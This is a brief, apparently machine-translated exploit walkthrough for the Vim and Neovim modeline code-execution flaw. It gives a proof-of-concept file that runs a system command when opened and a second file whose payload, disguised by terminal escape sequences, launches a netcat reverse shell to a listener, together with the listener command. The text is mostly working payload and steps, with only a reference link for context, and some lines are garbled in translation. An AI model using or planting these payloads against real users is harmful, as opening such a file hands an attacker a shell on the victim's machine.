Affected versions:
Vim < 8.1.1365, Neovim < 0.3.6
Prerequisite: open modeline
0x01 open modeline
Add a line to your .vimrc file in your home:
set the pattern
Shortly 0x02
Create a file poc.txt, content
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
Enter the command $ vim poc.txt
The system will uname -a
0x03 rebound shell
Creating shell.txt, reads as follows
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
Open two terminals:
An input command $ nc -lvvp 9999
Another command $ vim shell.txt
Success rebound shell
Reference links:
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md